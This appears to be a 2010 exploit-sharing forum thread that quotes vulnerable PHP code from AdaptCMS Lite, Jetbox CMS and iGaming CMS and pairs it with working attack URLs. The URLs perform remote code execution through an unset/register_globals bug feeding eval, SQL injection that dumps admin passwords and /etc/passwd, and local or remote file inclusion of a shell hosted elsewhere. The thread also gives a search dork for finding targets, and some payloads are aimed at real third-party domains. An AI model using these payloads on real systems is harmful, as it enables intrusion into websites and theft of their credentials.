if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim);
}
}
}
while($r = mysql_fetch_array($sql)) {
unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check);
...
$pab[0] = "{link}";
$pab[1] = "{date}";
$pab[2] = "{story}";
$pab[3] = "{comments}";
$pab[4] = "{cnum}";
$pab[5] = "{pcomment}";
$pab[6] = "{author}";
$pab[7] = "{section}";
$pab[8] = "{cat}";
$pab[9] = "{url}";
$pab[10] = "{title}";
....
$pab[30] = "{".$r[section]."_name}";
$pab[31] = "{".$r[section]."_username}";
$pab[32] = "{".$r[section]."_id}";
$pab[33] = "{".$r[section]."_views}";
$pab[34] = "{".$r[section]."_votes}";
$pab[35] = "{".$r[section]."_social_icons}";
...
// start - custom fields
$name = "";$data = "";$row = "";
$sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'");
while ($row = mysql_fetch_array($sql_cf)) {
$name = "$row[name]";
$data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'"));
$fdata[$name] = $data[0];
if ($data[0]) {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
if ($row[type] == "textarea") {
$rab[$m] = parse_text($data[0]);
$m = $m + 1;
$rab[$m] = parse_text($data[0]);
} else {
$rab[$m] = stripslashes(html_entity_decode($data[0]));
$m = $m + 1;
$rab[$m] = stripslashes(html_entity_decode($data[0]));
}
} else {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
$rab[$m] = "";
$m = $m + 1;
$rab[$m] = "";
}
}
// end - custom fields
...
eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php ");
...
The template ($temp[0]) is selected and the fields in it (array $pab) are replaced with the actual content (array $rab).
To execute our own command, we need to add one element to each array, where
$pab[400] = "{cat}"; ( such a field exists in the template $temp[0] )
$rab[400] = "php code"; (our command or script)
this is prevented by unset
unset($data, $datas, $pab, $rab, ...);
So we have to use the unset bug.
let's compute hash_del_key for php5
for pab = 2090607416
for rab = 2090679290
Eval
register_globals = On
a php version vulnerable to UNSET WHACKING
http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1
http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1
Last edited by nikp; 21.02.2010 at 20:48.
23.02.2010, 22:48
cms jetbox
http://sourceforge.net/projects/jetboxone/
dork:"Powered by Jetbox CMS ™"
Supports standard-style URLs, but works with its own
PHP code:
if ($use_standard_url_method==true) {
$url = explode("/",$url_to_split[1]); // Splits URL into array
---------------------------
phpinfo
http://localhost/jetbox/includes/phpinfo.php
http://www.js.mlc.edu.tw/php/jetbox/includes/phpinfo.php
---------------------------
index.php
PHP code:
if (isset($view)) {
$dodefaultpage=false;
$sql2="SELECT * FROM navigation WHERE view_name='".$view."'";
$r2 = mysql_prefix_query($sql2) or die(mysql_error()." q: ".$sql2."<br /> Line: ".__LINE__." <br/>File: ".__FILE__);
if ($ra2 = mysql_fetch_array($r2)){
//echo $ra2["file_name"];
include($ra2["file_name"]);
}
SQL+LFI
mq=off
rg=on
http://localhost/jetbox/?view=1'+union+select+1,"/boot.ini%",3,4,5,6,7,8,9,10,11,12+--+
http://www.egyptiancorner.org/ec/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+
SQL+RFI
magic_quotes_gpc = Off
register_globals = On
allow_url_include = On
http://localhost/jetbox/?view=-1'+union+select+1,"http://www.site.com/shell.txt",3,4,5,6,7,8,9,10,11,12+--+
http://ghostwriterreviews.com/jetbox/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+
----------------------------
blogs.php
PHP code:
...
if ($item<>'' && is_numeric($item)) {
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id AND struct.id=".$item;
}
elseif($option=='last10'){
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC LIMIT 10";
}
else{
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC";
}
#echo $sqlselect1;
$result1 = mysql_prefix_query ($sqlselect1) or die (mysql_error());
$blogscount= mysql_num_rows($result1);
if ($blogscount>'0') {
$view_tpl = new Template("./");
$view_tpl->set_file("block", "blogs_item_tpl.html");
$view_tpl->set_block("block", "blogs","blogsz");
$view_tpl->set_var(array("absolutepathfull"=>$absolutepathfull ));
while ($resultarray = mysql_fetch_array($result1)){
$records[1][5]=$resultarray["b_id"];
ob_start();
loggedin_workflow();
$containera = ob_get_contents();
ob_end_clean();
...
if ($item<>'' && is_numeric($item)) {
//$t->set_var("containera", "add comments", true);
$sqlselect1 = "SELECT * FROM blog_comments WHERE blog_id=".$id." ORDER BY blog_comments.c_id ASC";
$result1 = mysql_prefix_query($sqlselect1) or die (mysql_error());
$blog_commentcount= mysql_num_rows($result1);
if ($blog_commentcount>'0') {
$view_tpl2 = new Template("./");
$view_tpl2->set_file("block", "blog_comment_item_tpl.html");
$view_tpl2->set_block("block", "blog_comment","blog_commentz");
...
SQL
rg=on
http://localhost/jetbox/index.php?view=blog&item=1&id=1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+
http://localhost/jetbox/view/blog/item/1/id/1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+
Works if the blog has at least one entry.
We get the admin panel login and password (not the hash).
Last edited by nikp; 25.02.2010 at 08:57.
26.02.2010, 15:19
iGaming
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com
SQL injection
mq=off
games.php
PHP code:
$sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` ";
if (!empty($_REQUEST['title'])) {
$sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";
if (!empty($_REQUEST['section'])) {
$sql .= " AND `section` = '$_REQUEST[section]' ";
}
$sql .= " AND `published` = '1' ";
} else {
if (!empty($_REQUEST['section'])) {
$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";
} else {
$sql .= "WHERE `published` = '1' ";
...
if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
Code:
http://localhost/games.php?order=genre&section=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort=
index.php
Code:
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+
previews.php
PHP code:
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
Code:
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+
Admin Panel (SQL inj) (LFI)
LFI : support.php
PHP code:
require_once("../sources/docs/$_REQUEST[id].php");
Code:
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off
PHP code:
if (isset($_REQUEST['s'])) {
$latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
Code:
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+
Last edited by [x60]unu; 26.02.2010 at 18:11.